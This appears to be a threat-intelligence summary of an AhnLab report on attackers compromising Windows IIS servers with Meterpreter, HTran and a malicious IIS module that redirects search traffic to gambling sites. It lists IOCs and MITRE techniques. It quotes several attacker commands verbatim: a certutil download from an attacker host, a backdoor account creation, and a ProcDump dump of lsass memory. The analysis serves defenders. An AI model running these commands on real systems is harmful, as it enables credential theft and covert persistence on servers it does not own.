Threat Research

Cases of malicious code distribution through illegal gambling advertisement sites targeting domestic web servers.

Ahnlab

AhnLab ASEC reported attackers compromising poorly managed Windows IIS web servers to install a Meterpreter backdoor, an HTran port-forwarding tool, and a malicious IIS module that injects obfuscated JavaScript to redirect search-portal traffic to illegal gambling pages. The intruders also used ProcDump to dump lsass.exe and created local accounts to persist and enable lateral movement. #Meterpreter #IISModule

Keypoints

  • Attackers gained access to poorly managed Windows IIS servers and executed reconnaissance commands (ipconfig, systeminfo, whoami) before deploying payloads.
  • A Meterpreter backdoor was installed and controlled via attacker IP/port, used to receive and execute shellcode on the server.
  • HTran (an open-source port-forwarding tool) was deployed via w3wp.exe to enable proxied remote access, commonly for RDP tunneling.
  • Attackers created a persistent local account (net user kr$ test123!@# /add) to maintain access after initial intrusion.
  • A malicious IIS module DLL was registered and hooked into the OnSendResponse handler to modify HTTP responses and inject obfuscated scripts that load hxxps://ll.olacityviet.com/av.js, exposing gambling pages to search portals.
  • ProcDump was abused to dump lsass.exe memory (%ALLUSERSPROFILE%p.exe -accepteula -ma lsass.exe C:ProgramDataxxx.zip) to steal credentials for lateral movement.
  • Known IOCs include Meterpreter MD5 d5312ab7f01fd74d399c392effdfe437, IIS module hashes, C2 IP 43.156.50[.]76, and domains ll.olacityviet[.]com and moojukschool[.]com used for payload delivery.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The attackers targeted “improperly managed domestic Windows Internet Information Services (IIS) web server” to gain initial access. [‘improperly managed domestic Windows Internet Information Services (IIS) web server’]
  • [T1105] Ingress Tool Transfer – Tools and payloads were transferred to the server using certutil to download files (e.g., “certutil -urlcache -split -f hxxp://moojukschool[.]com/msf.txt”). [‘certutil -urlcache -split -f hxxp://moojukschool[.]com/msf.txt’]
  • [T1219] Remote Access Software – A Meterpreter backdoor was installed and “is executed by receiving the attacker’s IP and port number,” allowing remote command execution and shellcode delivery. [‘meterpreter backdoor is executed by receiving the attacker’s IP and port number’]
  • [T1090] Proxy – The HTran port forwarding tool was deployed “through the w3wp.exe process” to forward ports and enable remote access (commonly for RDP). [‘installed the HTran utility through the w3wp.exe process’]
  • [T1059] Command and Scripting Interpreter – The threat actor executed native commands and scripts (ipconfig, systeminfo, certutil, curl) during reconnaissance and payload deployment. [‘ipconfig’, ‘systeminfo’, ‘certutil’]
  • [T1003] Credential Dumping – ProcDump was used to dump lsass.exe memory (“%ALLUSERSPROFILE%p.exe -accepteula -ma lsass.exe C:ProgramDataxxx.zip”) to extract credentials. [‘%ALLUSERSPROFILE%p.exe -accepteula -ma lsass.exe C:ProgramDataxxx.zip’]
  • [T1505] Server Software Component – A malicious IIS module DLL was registered and injected into the web server’s response pipeline, altering HTTP responses and injecting JavaScript to redirect search-portal traffic. [‘malicious code inserted malicious code into the OnSendResponse handler’]

Indicators of Compromise

  • [MD5] Payload file hashes – d5312ab7f01fd74d399c392effdfe437 (Meterpreter backdoor), ebeb931a6dd91a227225f0ff92142f2b (IIS module x64)
  • [IP Address] C2 server – 43.156.50[.]76 (Meterpreter C&C address)
  • [Domain] Malicious/redirect domains – ll.olacityviet[.]com (script loader hxxps://ll.olacityviet.com/av.js), jsc.olacityviet[.]com
  • [Domain] Download host – moojukschool[.]com (used with certutil to fetch msf.txt)

    • <li/[File path] Dump command and artifacts – %ALLUSERSPROFILE%p.exe used to dump lsass.exe to C:ProgramDataxxx.zip

  • [Filename] Created local account evidence – net user kr$ (account created with command “net user kr$ test123!@# /add”)

The attacker flow and technical procedure condensed:

1) Initial access and reconnaissance: The adversary targeted exposed/poorly managed Windows IIS servers, enumerated system information using commands such as ipconfig, systeminfo, whoami, and then used certutil to download additional files (e.g., certutil -urlcache -split -f hxxp://moojukschool[.]com/msf.txt). A Meterpreter backdoor was deployed and configured to receive the attacker’s IP/port and execute received shellcode, providing remote control.

2) Persistence and remote reachback: Via the Meterpreter session the attacker installed HTran (a port-forwarding tool) through the w3wp.exe process to proxy remote connections (commonly for RDP), and created a local account (net user kr$ test123!@# /add) to retain access. They built and registered a malicious IIS module DLL in C:WindowsSystem32inetsrv, registering a handler for the OnSendResponse event so the malicious function runs whenever the server sends responses.

3) HTTP response manipulation and credential theft: The IIS module inspected HTTP headers (User-Agent, Referer) to detect search-portal crawlers and injected an obfuscated script that writes a script tag loading hxxps://ll.olacityviet.com/av.js, redirecting portal traffic to gambling pages and stealing cookie data. After module installation the attacker abused ProcDump to dump lsass.exe memory (%ALLUSERSPROFILE%p.exe -accepteula -ma lsass.exe C:ProgramDataxxx.zip) to harvest credentials for lateral movement. Noted IOCs include Meterpreter MD5 d5312ab7f01fd74d399c392effdfe437, IIS module hashes, C2 43.156.50[.]76, and domains ll.olacityviet[.]com / moojukschool[.]com.

Read more: https://asec.ahnlab.com/ko/64558